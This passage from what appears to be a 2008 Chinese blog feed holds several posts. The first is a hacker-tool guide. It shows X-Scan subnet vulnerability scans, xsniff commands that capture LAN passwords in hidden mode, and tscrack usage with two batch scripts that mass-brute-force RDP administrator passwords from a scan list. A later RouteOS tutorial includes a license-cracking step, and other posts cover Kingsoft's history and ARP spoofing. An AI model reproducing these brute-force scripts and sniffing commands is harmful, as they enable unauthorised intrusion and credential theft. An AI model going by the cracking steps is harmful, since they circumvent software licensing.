<P style="TEXT-INDENT: 2em">用法示例 </P>
<P style="TEXT-INDENT: 2em">xscan -host 192.168.1.1-192.168.255.255 -all -active -p　 检测</P>
<P style="TEXT-INDENT: 2em">192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机 </P>
<P style="TEXT-INDENT: 2em">xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测</P>
<P style="TEXT-INDENT: 2em">192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大</P>
<P style="TEXT-INDENT: 2em">并发线程数量为150，跳过没有检测到开放端口的主机 </P>
<P style="TEXT-INDENT: 2em">xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”</P>
<P style="TEXT-INDENT: 2em">文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同</P>
<P style="TEXT-INDENT: 2em">一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机</P>
<P style="TEXT-INDENT: 2em"><A href="http://www.jz5u.com/">www.jz5u.com</A></P>
<P style="TEXT-INDENT: 2em">#9 九：</P>
<P style="TEXT-INDENT: 2em">3、命令行方式嗅探器: xsniff.exe</P>
<P style="TEXT-INDENT: 2em">可捕获局域网内FTP/^TP/POP3/HTTP协议密码</P>
<P style="TEXT-INDENT: 2em">参数说明 </P>
<P style="TEXT-INDENT: 2em">-tcp 输出TCP数据报 </P>
<P style="TEXT-INDENT: 2em">-udp 输出UDP数据报 </P>
<P style="TEXT-INDENT: 2em">-icmp 输出ICMP数据报 </P>
<P style="TEXT-INDENT: 2em">-pass 过滤密码信息 </P>
<P style="TEXT-INDENT: 2em">-hide 后台运行 </P>
<P style="TEXT-INDENT: 2em">-host 解析主机名 </P>
<P style="TEXT-INDENT: 2em">-addr IP地址 过滤IP地址 </P>
<P style="TEXT-INDENT: 2em">-port 端口 过滤端口 </P>
<P style="TEXT-INDENT: 2em">-log 文件名 将输出保存到文件 </P>
<P style="TEXT-INDENT: 2em">-asc 以ASCII形式输出 </P>
<P style="TEXT-INDENT: 2em">-hex 以16进制形式输出 </P>
<P style="TEXT-INDENT: 2em">用法示例 </P>
<P style="TEXT-INDENT: 2em">xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在</P>
<P style="TEXT-INDENT: 2em">pass.log文件中 </P>
<P style="TEXT-INDENT: 2em">xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和</P>
<P style="TEXT-INDENT: 2em">udp信息并以ASCII格式输出 </P>
<P style="TEXT-INDENT: 2em">4、终端服务密码破解: tscrack.exe</P>
<P style="TEXT-INDENT: 2em">参数说明 </P>
<P style="TEXT-INDENT: 2em">-h 显示使用帮助 </P>
<P style="TEXT-INDENT: 2em">-v 显示版本信息 </P>
<P style="TEXT-INDENT: 2em">-s 在屏幕上打出解密能力 </P>
<P style="TEXT-INDENT: 2em">-b 密码错误时发出的声音 </P>
<P style="TEXT-INDENT: 2em">-t 同是发出多个连接（多线程） </P>
<P style="TEXT-INDENT: 2em">-N Prevent System Log entries on targeted server </P>
<P style="TEXT-INDENT: 2em">-U 卸载移除tscrack组件 </P>
<P style="TEXT-INDENT: 2em">-f 使用－f后面的密码 </P>
<P style="TEXT-INDENT: 2em">-F 间隔时间（频率） </P>
<P style="TEXT-INDENT: 2em">-l 使用－l后面的用户名 </P>
<P style="TEXT-INDENT: 2em">-w 使用－w后面的密码字典 </P>
<P style="TEXT-INDENT: 2em">-p 使用－p后面的密码 </P>
<P style="TEXT-INDENT: 2em">-D 登录主页面 </P>
<P style="TEXT-INDENT: 2em">用法示例 </P>
<P style="TEXT-INDENT: 2em">tscrack 192.168.0.1 -l ***istrator -w pass.dic 远程用密码字典文件暴破主</P>
<P style="TEXT-INDENT: 2em">机的***istrator的登陆密码 </P>
<P style="TEXT-INDENT: 2em">tscrack 192.168.0.1 -l ***istrator -p 123456 用密码123456远程登陆</P>
<P style="TEXT-INDENT: 2em">192.168.0.1的***istrator用户 </P>
<P style="TEXT-INDENT: 2em">@if not exist ipcscan.txt goto noscan </P>
<P style="TEXT-INDENT: 2em">@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i </P>
<P style="TEXT-INDENT: 2em">nscan </P>
<P style="TEXT-INDENT: 2em">@echo 3389.txt no find or scan faild </P>
<P style="TEXT-INDENT: 2em">(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主</P>
<P style="TEXT-INDENT: 2em">机IP列表文件3389.txt) </P>
<P style="TEXT-INDENT: 2em">3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat </P>
<P style="TEXT-INDENT: 2em">@if not exist tscrack.exe goto noscan </P>
<P style="TEXT-INDENT: 2em">@tscrack %1 -l ***istrator -w pass.dic &gt;&gt;rouji.txt </P>
<P style="TEXT-INDENT: 2em">:noscan </P>
<P style="TEXT-INDENT: 2em">@echo tscrack.exe no find or scan faild </P>
<P style="TEXT-INDENT: 2em">(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、</P>
<P style="TEXT-INDENT: 2em">pass.dic与tscrack.exe在同一个目录下；就可以等待结果了) </P>
<P style="TEXT-INDENT: 2em">hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的</P>
<P style="TEXT-INDENT: 2em">***istrator密码，并将破解结果保存在rouji.txt文件中。 </P>
<P style="TEXT-INDENT: 2em">5、其它：</P>
<P style="TEXT-INDENT: 2em">Shutdown.exe </P>
<P style="TEXT-INDENT: 2em">Shutdown <A href="http://www.sina.com.cn/">www.sina.com.cn</A> 当有人扫锚你的80端口时，他扫</P>
<P style="TEXT-INDENT: 2em">到的结果会完全是<A href="http://www.sina.com.cn/">www.sina.com.cn</A>的主机信息 </P>
<P style="TEXT-INDENT: 2em">Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端</P>
<P style="TEXT-INDENT: 2em">口重定向后，就通过88端口发送到目标IP的23端口。（与目标IP建立Telnet时本</P>
<P style="TEXT-INDENT: 2em">机就用的88端口与其相连接）然后：直接Telnet 127.0.0.1（本机IP）就连接到</P>
<P style="TEXT-INDENT: 2em">目标IP的23端口了。 </P>
<P style="TEXT-INDENT: 2em">OpenTelnet.exe (远程开启telnet工具) </P>
<P style="TEXT-INDENT: 2em">opentelnet.exe <A href="http://www.jz5u.com/">www.jz5u.com</A></P>
<P style="TEXT-INDENT: 2em">63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用</P>
<P style="TEXT-INDENT: 2em">stream结构。 </P>
<P style="TEXT-INDENT: 2em">64.sunique：将远程主机文件名存储设置为只一(与runique对应)。</P>
<P style="TEXT-INDENT: 2em">65.system：显示远程主机的操作系统类型。 </P>
<P style="TEXT-INDENT: 2em">66.tenex：将文件传输类型设置为TENEX机的所需的类型。</P>
<P style="TEXT-INDENT: 2em">67.tick：设置传输时的字节计数器。 </P>
<P style="TEXT-INDENT: 2em">68.trace：设置包跟踪。</P>
<P style="TEXT-INDENT: 2em">69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type </P>
<P style="TEXT-INDENT: 2em">binary，设置二进制传输方式。 </P>
<P style="TEXT-INDENT: 2em">70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3</P>
<P style="TEXT-INDENT: 2em">71.user user-name[password][account]：向远程主机表明自己的身份，需要口</P>
<P style="TEXT-INDENT: 2em">令时，必须输入口令，如：user anonymous <A href="http://bbs.txwm.com/mailtmy@email">my@email</A>。 </P>
<P style="TEXT-INDENT: 2em">72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp 服务器的所有响 应</P>
<P style="TEXT-INDENT: 2em">都将显示给用户，缺省为on.</P>
<P style="TEXT-INDENT: 2em">73.?[cmd]：同help.</P>
<P style="TEXT-INDENT: 2em">#11 十一：</P>
<P style="TEXT-INDENT: 2em">7：计算机运行命令全集 winver---------检查Windows版本</P>
<P style="TEXT-INDENT: 2em">wmimgmt.msc----打开windows管理体系结构</P>
<P style="TEXT-INDENT: 2em">wupdmgr--------windows更新程序</P>
<P style="TEXT-INDENT: 2em">winver---------检查Windows版本</P>
<P style="TEXT-INDENT: 2em">wmimgmt.msc----打开windows管理体系结构</P>
<P style="TEXT-INDENT: 2em">wupdmgr--------windows更新程序</P>
<P style="TEXT-INDENT: 2em">wscript--------windows脚本宿主设置</P>
<P style="TEXT-INDENT: 2em">write----------写字板winmsd-----系统信息</P>
<P style="TEXT-INDENT: 2em">wiaacmgr-------扫描仪和照相机向导</P>
<P style="TEXT-INDENT: 2em">winchat--------XP自带局域网聊天</P>
<P style="TEXT-INDENT: 2em">mem.exe--------显示内存使用情况</P>
<P style="TEXT-INDENT: 2em">Msconfig.exe---系统配置实用程序 </P>
<P style="TEXT-INDENT: 2em">mplayer2-------简易widnows media player</P>
<P style="TEXT-INDENT: 2em">mspaint--------画图板</P>
<P style="TEXT-INDENT: 2em">mstsc----------远程桌面连接</P>
<P style="TEXT-INDENT: 2em">mplayer2-------媒体播放机</P>
<P style="TEXT-INDENT: 2em">magnify--------放大镜实用程序</P>
<P style="TEXT-INDENT: 2em">mmc------------打开控制台</P>
<P style="TEXT-INDENT: 2em">mobsync--------同步命令</P>
<P style="TEXT-INDENT: 2em">dxdiag---------检查DirectX信息</P>
<P style="TEXT-INDENT: 2em">drwtsn32------ 系统医生</P>
<P style="TEXT-INDENT: 2em">devmgmt.msc--- 设备管理器</P>
<P style="TEXT-INDENT: 2em">dfrg.msc-------磁盘碎片整理程序</P>
<P style="TEXT-INDENT: 2em">diskmgmt.msc---磁盘管理实用程序</P>
<P style="TEXT-INDENT: 2em">dcomcnfg-------打开系统组件服务</P>
<P style="TEXT-INDENT: 2em">ddeshare-------打开DDE共享设置</P>
<P style="TEXT-INDENT: 2em">dvdplay--------DVD播放器</P>
<P style="TEXT-INDENT: 2em">net stop messenger-----停止信使服务</P>
<P style="TEXT-INDENT: 2em">net start messenger----开始信使服务 </P>
<P style="TEXT-INDENT: 2em">notepad--------打开记事本</P>
<P style="TEXT-INDENT: 2em">nslookup-------网络管理的工具向导</P>
<P style="TEXT-INDENT: 2em">ntbackup-------系统备份和还原</P>
<P style="TEXT-INDENT: 2em">narrator-------屏幕"讲述人"</P>
<P style="TEXT-INDENT: 2em">ntmsmgr.msc----移动存储管理器</P>
<P style="TEXT-INDENT: 2em">ntmsoprq.msc---移动存储管理员操作请求</P>
<P style="TEXT-INDENT: 2em">netstat -an----(TC)命令检查接口</P>
<P style="TEXT-INDENT: 2em">syncapp--------创建一个公文包</P>
<P style="TEXT-INDENT: 2em">sysedit--------系统配置编辑器</P>
<P style="TEXT-INDENT: 2em">sigverif-------文件签名验证程序</P>
<P style="TEXT-INDENT: 2em">sndrec32-------录音机</P>
<P style="TEXT-INDENT: 2em">shrpubw--------创建共享文件夹</P>
<P style="TEXT-INDENT: 2em">secpol.msc-----本地安全策略</P>
<P style="TEXT-INDENT: 2em">syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密</P>
<P style="TEXT-INDENT: 2em">码</P>
<P style="TEXT-INDENT: 2em">services.msc---本地服务设置</P>
<P style="TEXT-INDENT: 2em">Sndvol32-------音量控制程序</P>
<P style="TEXT-INDENT: 2em">sfc.exe--------系统文件检查器</P>
<P style="TEXT-INDENT: 2em">sfc /scannow---windows文件保护</P>
<P style="TEXT-INDENT: 2em">tsshutdn-------60秒倒计时关机命令</P>
<P style="TEXT-INDENT: 2em">tourstart------xp简介（安装完成后出现的漫游xp程序）</P>
<P style="TEXT-INDENT: 2em">taskmgr--------任务管理器</P>
<P style="TEXT-INDENT: 2em">eventvwr-------事件查看器</P>
<P style="TEXT-INDENT: 2em">eudcedit-------造字程序 </P>
<P style="TEXT-INDENT: 2em">explorer-------打开资源管理器</P>
<P style="TEXT-INDENT: 2em">packager-------对象包装程序</P>
<P style="TEXT-INDENT: 2em">perfmon.msc----计算机性能监测程序</P>
<P style="TEXT-INDENT: 2em">progman--------程序管理器</P>
<P style="TEXT-INDENT: 2em">regedit.exe----注册表 </P>
<P style="TEXT-INDENT: 2em">rsop.msc-------组策略结果集</P>
<P style="TEXT-INDENT: 2em">regedt32-------注册表编辑器</P>
<P style="TEXT-INDENT: 2em">rononce -p ----15秒关机</P>
<P style="TEXT-INDENT: 2em">regsvr32 /u *.dll----停止dll文件运行</P>
<P style="TEXT-INDENT: 2em">regsvr32 /u zipfldr.dll------取消ZIP支持</P>
<P style="TEXT-INDENT: 2em">cmd.exe--------CMD命令提示符</P>
<P style="TEXT-INDENT: 2em">chkdsk.exe-----Chkdsk磁盘检查</P>
<P style="TEXT-INDENT: 2em">certmgr.msc----证书管理实用程序</P>
<P style="TEXT-INDENT: 2em">calc-----------启动计算器</P>
<P style="TEXT-INDENT: 2em">charmap--------启动字符映射表</P>
<P style="TEXT-INDENT: 2em">cliconfg-------SQL SERVER 客户端网络实用程序</P>
<P style="TEXT-INDENT: 2em">Clipbrd--------剪贴板查看器</P>
<P style="TEXT-INDENT: 2em">conf-----------启动netmeeting</P>
<P style="TEXT-INDENT: 2em">compmgmt.msc---计算机管理</P>
<P style="TEXT-INDENT: 2em">cleanmgr-------**整理</P>
<P style="TEXT-INDENT: 2em">ciadv.msc------索引服务程序</P>
<P style="TEXT-INDENT: 2em">osk------------打开屏幕键盘</P>
<P style="TEXT-INDENT: 2em">odbcad32-------ODBC数据源管理器</P>
<P style="TEXT-INDENT: 2em">oobe/msoobe /a----检查XP是否激活</P>
<P style="TEXT-INDENT: 2em">lusrmgr.msc----本机用户和组</P>
<P style="TEXT-INDENT: 2em">logoff---------注销命令</P>
<P style="TEXT-INDENT: 2em">iexpress-------木马捆绑工具，系统自带</P>
<P style="TEXT-INDENT: 2em">Nslookup-------IP地址侦测器</P>
<P style="TEXT-INDENT: 2em">fsmgmt.msc-----共享文件夹管理器</P>
<P style="TEXT-INDENT: 2em">utilman--------辅助工具管理器</P>
<P style="TEXT-INDENT: 2em">gpedit.msc-----组策略 </P>
<P style="TEXT-INDENT: 2em"></P></TD></TR></TBODY></TABLE></BLOCKQUOTE></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/4819109420083845731334</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/4819109420083845731334</guid>
    <pubDate>Tue, 8 Apr 2008 16:57:31 +0800</pubDate>
    <dcterms:modified>2008-04-08T16:58:04+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[金山软件发展历程一览]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/4819109420082273534366</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em"><FONT color=#ff0000>背景资料：金山软件发展历程一览(表)</FONT></P>
<P style="TEXT-INDENT: 2em">
<TABLE cellSpacing=1 cellPadding=3 width="97%" align=center border=0>
<TBODY>
<TR>
<TD align=left><FONT color=#ff0000>1989年</FONT></TD>
<TD align=left><FONT color=#ff0000>求伯君加入金山，设立深圳开发部。</FONT></TD></TR>
<TR>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>1994年</FONT></TD>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>成立北京金山软件公司</FONT></TD></TR>
<TR bgColor=#ffffff>
<TD align=left><FONT color=#ff0000>1996年</FONT></TD>
<TD align=left><FONT color=#ff0000>发布国内第一款商业游戏《中关村启示录》西山居品牌切入游戏产业</FONT></TD></TR>
<TR>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>1997年</FONT></TD>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>发布中国第一款RPG游戏《剑侠情缘》；发布著名词典软件《金山词霸》；发布Windows版本的《WPS 97》</FONT></TD></TR>
<TR bgColor=#ffffff>
<TD align=left><FONT color=#ff0000>1998</FONT></TD>
<TD align=left><FONT color=#ff0000>联想入股金山，金山重组</FONT></TD></TR>
<TR>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>2000年</FONT></TD>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>金山公司投资卓越网。《金山毒霸》上市</FONT></TD></TR>
<TR bgColor=#ffffff>
<TD align=left><FONT color=#ff0000>2002年12月</FONT></TD>
<TD align=left><FONT color=#ff0000>西山居推出3D动作类游戏《天王》贺岁游戏</FONT></TD></TR>
<TR>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>2003年4月</FONT></TD>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>发布“技术立业，角逐网络游戏，启航企业业务”战略。筹建金山北京研究院，组建金山数字娱乐有限公司</FONT></TD></TR>
<TR bgColor=#ffffff>
<TD align=left><FONT color=#ff0000>2003年7月</FONT></TD>
<TD align=left><FONT color=#ff0000>隆重推出耗资1500万、耗时三年研发的《剑侠情缘网络版》</FONT></TD></TR>
<TR>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>2004年2月</FONT></TD>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>发布“技术立业 决胜网游 金山公司2004新架构新战略”</FONT></TD></TR>
<TR bgColor=#ffffff>
<TD align=left><FONT color=#ff0000>2004年10月</FONT></TD>
<TD align=left><FONT color=#ff0000>正式推出网游新作《封神榜》</FONT></TD></TR>
<TR>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>2005年4月</FONT></TD>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>《金山毒霸2005安全组合装》正式上市，开创“软件免费、服务有偿”的商业模式</FONT></TD></TR>
<TR bgColor=#ffffff>
<TD align=left><FONT color=#ff0000>2005年6月</FONT></TD>
<TD align=left><FONT color=#ff0000>《剑网》登陆越南</FONT></TD></TR>
<TR>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>2005年9月</FONT></TD>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>金山毒霸强势登陆日本，创中国通用软件公司进入日本市场的先河。金山日本公司成立</FONT></TD></TR>
<TR bgColor=#ffffff>
<TD align=left><FONT color=#ff0000>2005年9月</FONT></TD>
<TD align=left><FONT color=#ff0000>金山软件公司正式发布十年来第11款游戏作品《剑侠情缘网络版2》</FONT></TD></TR>
<TR>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>2005年12月</FONT></TD>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>金山与华义达成战略联盟，全面接管华义在大陆的所有业务</FONT></TD></TR>
<TR bgColor=#ffffff>
<TD align=left><FONT color=#ff0000>2005年12月</FONT></TD>
<TD align=left><FONT color=#ff0000>爱词霸网正式运营，基于互联网应用的全新产品-“词霸豆豆”也同时在各权威网站发布</FONT></TD></TR>
<TR>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>2006年7月</FONT></TD>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>金山宣布结盟火石软件，签约代理Q版网游《水浒Q传》</FONT></TD></TR>
<TR bgColor=#ffffff>
<TD align=left><FONT color=#ff0000>2006年8月</FONT></TD>
<TD align=left><FONT color=#ff0000>金山获新加坡GIC、英特尔投资和新宏远创基金注资7200万美元，金山迈入新里程</FONT></TD></TR>
<TR>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>2006年9月</FONT></TD>
<TD align=left bgColor=#eeeeee><FONT color=#ff0000>Kingsoft Office 2007在东京发布，金山WPS国际化战略正式启动，首站登陆日本</FONT></TD></TR>
<TR bgColor=#ffffff>
<TD align=left><FONT color=#ff0000>2007年</FONT></TD>
<TD align=left><FONT color=#ff0000>重组公司业务为两大部分：娱乐软件和应用软件</FONT></TD></TR></TBODY></TABLE></P>
<P style="TEXT-INDENT: 2em"><FONT color=#ff0000></FONT></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/4819109420082273534366</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/4819109420082273534366</guid>
    <pubDate>Thu, 27 Mar 2008 15:53:43 +0800</pubDate>
    <dcterms:modified>2008-03-27T15:54:34+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[ARP]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/481910942008222852751</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">ARP定义</P>
<P style="TEXT-INDENT: 2em">ARP（Address Resolution Protocol，地址解析协议）是一个位于TCP/IP协议栈中的底层协议，负责将某个IP地址解析成对应的MAC地址。</P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">遭受ARP攻击后现象</P>
<P style="TEXT-INDENT: 2em">ARP欺骗木马的中毒现象表现为：使用局域网时会突然掉线，过一段时间后又会恢复正常。比如客户端状态频频变红，用户频繁断网，IE浏览器频繁出错，以及一些常用软件出现故障等。如果局域网中是通过身份认证上网的，会突然出现可认证，但不能上网的现象（无法ping通网关），重启机器或在MS-DOS窗口下运行命令arp -d后，又可恢复上网。</P>
<P style="TEXT-INDENT: 2em">ARP欺骗木马只需成功感染一台电脑，就可能导致整个局域网都无法上网，严重的甚至可能带来整个网络的瘫痪。该木马发作时除了会导致同一局域网内的其他用户上网出现时断时续的现象外，还会窃取用户密码。如盗取QQ密码、盗取各种网络游戏密码和账号去做金钱交易，盗窃网上银行账号来做非法交易活动等，这是木马的惯用伎俩，给用户造成了很大的不便和巨大的经济损失。</P>
<P style="TEXT-INDENT: 2em">ARP攻击原理</P>
<P style="TEXT-INDENT: 2em">ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。</P>
<P style="TEXT-INDENT: 2em">ARP攻击主要是存在于局域网网络中，局域网中若有一个人感染ARP木马，则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息，并因此造成网内其它计算机的通信故障。</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/481910942008222852751</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/481910942008222852751</guid>
    <pubDate>Sat, 22 Mar 2008 08:52:07 +0800</pubDate>
    <dcterms:modified>2008-03-22T08:52:07+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[ROS菜鸟篇，教你一步一步成为ROS能手]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/4819109420082100023841</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">ROS菜鸟篇，教你一步一步成为ROS能手</P>
<P style="TEXT-INDENT: 2em">&nbsp;</P>
<P style="TEXT-INDENT: 2em">
<TABLE>
<TBODY>
<TR>
<TD>
<P></P>
<P style="TEXT-INDENT: 2em">一：安装</P>
<P style="TEXT-INDENT: 2em">1、光盘版的（转自雨纷飞大哥作品）</P>
<P style="TEXT-INDENT: 2em">将iso文件刻录成可引导光盘。机器的硬盘设置为IDE0，即第一个IDE通道的主盘。</P>
<P style="TEXT-INDENT: 2em">bios设置光盘引导系统，放入光盘启动机器得到如下画面：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0> <A href="http://img.pcpop.com/upimg3/2005/6/1/1054697349.jpg">点击浏览该文件</A></P>
<P style="TEXT-INDENT: 2em"><IMG src="http://img.pcpop.com/upimg3/2005/6/1/1054697349.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">选择 2：Install RouteOS 2.8.18后稍等，得到如下画面：</P>
<P style="TEXT-INDENT: 2em">用方向键和空格选择你需要的模组功能后，摁“i“键确定安装。会再次询问你继续？yes or no?，摁“Y“.</P>
<P style="TEXT-INDENT: 2em">然后又问:do you want to keep lod configuraton?你需要保留旧的结构么?摁“N“.</P>
<P style="TEXT-INDENT: 2em">然后开始自动的格式化磁盘、安装核心、安装模组。最后提示：</P>
<P style="TEXT-INDENT: 2em">Press ENTER to Reboot，按回车重新启动机器。</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0> <A href="http://img.pcpop.com/upimg3/2005/6/1/1027979657.jpg">点击浏览该文件</A></P>
<P style="TEXT-INDENT: 2em"><IMG src="http://img.pcpop.com/upimg3/2005/6/1/1027979657.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">重新启动后出现图1的那个引导画面(如果没有出现而直接进了登陆界面说明用硬盘引导了)：</P>
<P style="TEXT-INDENT: 2em">选择3: Crack RouteOS Floppy Disk,开始^^。</P>
<P style="TEXT-INDENT: 2em">^^过程都是中文的。如果你的硬盘在IDE0:0的话^^是不会有问题的。否则可能出现系统文件被破坏、启动时0123456...循环出现等问题。</P>
<P style="TEXT-INDENT: 2em">问你是否重启呢。把光盘拿出来后按下Y确定重启动</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0> <A href="http://img.pcpop.com/upimg3/2005/6/1/1012767349.jpg">点击浏览该文件</A></P>
<P style="TEXT-INDENT: 2em"><IMG src="http://img.pcpop.com/upimg3/2005/6/1/1012767349.jpg" border=0></P>
<P style="TEXT-INDENT: 2em">重新启动后开始登陆。初始用户名admin，初始密码为空。</P>
<P style="TEXT-INDENT: 2em">咦？怎么还有提示注册的信息和Soft ID？</P>
<P style="TEXT-INDENT: 2em">原来是还需要一个命令激活注册补丁才可以哦：</P>
<P style="TEXT-INDENT: 2em">输入命令：/system license import file-name=key</P>
<P style="TEXT-INDENT: 2em">或者缩写为/sy lic i f key</P>
<P style="TEXT-INDENT: 2em">然后提示你是否重新启动。按Y重新启动</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/20051214234659146.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/20051214234659146.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">重新启动并用admin:““登陆后发现，提示注册的信息已经完全消失了，现在是正式版了</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/2005121423477534.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/2005121423477534.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">现在服务器启动起来了，但是还没有任何配置，若想用winbox对其进行控制，则必须激活和配置网卡的ip 掩码等。这里我装了三块网卡，一块接电信，一块接网通，一块路由后接内网交换机。</P>
<P style="TEXT-INDENT: 2em">首先看看三块网卡是否都被识别出来了，命令是：</P>
<P style="TEXT-INDENT: 2em">/interface</P>
<P style="TEXT-INDENT: 2em">print</P>
<P style="TEXT-INDENT: 2em">可以缩写为</P>
<P style="TEXT-INDENT: 2em">/int</P>
<P style="TEXT-INDENT: 2em">pri</P>
<P style="TEXT-INDENT: 2em">以后用缩写不再另外注名。</P>
<P style="TEXT-INDENT: 2em">结果应该如下图：</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/2005121423472183.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/2005121423472183.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">然后我们来激活他们，命令是：</P>
<P style="TEXT-INDENT: 2em">ENABLE 0 </P>
<P style="TEXT-INDENT: 2em">ENABLE 1</P>
<P style="TEXT-INDENT: 2em">ENABLE 2</P>
<P style="TEXT-INDENT: 2em">0是第一块网卡。</P>
<P style="TEXT-INDENT: 2em">激活后没有提示。用print命令查看后发现网卡前面的X变成R，就代表激活成功了。</P>
<P style="TEXT-INDENT: 2em">如下图</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/20051214234726551.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/20051214234726551.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">但是ether1 ether2之类的名字实在是抽象不便于以后的配置，所以我们把网卡给改个名字：</P>
<P style="TEXT-INDENT: 2em">命令：</P>
<P style="TEXT-INDENT: 2em">SET 0 NAME=newname</P>
<P style="TEXT-INDENT: 2em">我这里用</P>
<P style="TEXT-INDENT: 2em">set 0 name=dianxin</P>
<P style="TEXT-INDENT: 2em">set 1 name=wangtong</P>
<P style="TEXT-INDENT: 2em">set 2 name=neiwang</P>
<P style="TEXT-INDENT: 2em">如下图：改名成功。</P>
<P style="TEXT-INDENT: 2em"><IMG src="http://bbs.txwm.com/skins/default/filetype/jpg.gif" border=0>此主题相关图片如下：</P>
<P style="TEXT-INDENT: 2em"><A href="http://bbs.txwm.com/UploadFile/2005-12/20051214234818447.jpg"><IMG src="http://bbs.txwm.com/UploadFile/2005-12/20051214234818447.jpg" border=0></A></P>
<P style="TEXT-INDENT: 2em">然后给他们相应的IP。</P>
<P style="TEXT-INDENT: 2em">先返回顶层目录，用/键就可以了。</P>
<P style="TEXT-INDENT: 2em">然后输入：</P>
<P style="TEXT-INDENT: 2em">IP</P>
<P style="TEXT-INDENT: 2em">ADDRESS </P>
